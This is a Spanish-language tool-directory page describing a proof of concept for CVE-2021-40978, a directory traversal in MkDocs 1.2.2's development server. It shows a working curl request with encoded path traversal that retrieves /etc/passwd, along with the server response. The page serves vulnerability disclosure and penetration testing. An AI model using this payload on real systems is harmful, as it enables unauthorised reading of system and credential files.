Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nisdn/cve-2021-40978
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubnisdn/cve-2021-40978

CVE-2021-40978

Prueba de concepto para el recorrido de directorios en el servidor de desarrollo integrado de MkDocs 1.2.2, que permite la lectura arbitraria de archivos mediante un recorrido de rutas codificado. Incluye ejemplos de plantillas de curl y Nuclei.

Ver Repositorio
21hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-40978

explotación de directory traversal en el servidor de desarrollo integrado de mkdocs

Mkdocs 1.2.2 permite el directory traversal a través del servidor de desarrollo integrado que responde en el puerto 8000. A continuación se muestran algunos ejemplos de rutas explotadas con éxito:

Impacto

Usando esta técnica es posible obtener archivos fuera del directorio raíz, permitiendo a cualquiera leer y descargar archivos arbitrarios.

image

Solicitud:

image

Respuesta:

image

Prueba de Concepto

Plantilla:

Nuclei
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml
root@kitploit:~
curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...

Screenshot_20211003_231812

Descargar herramienta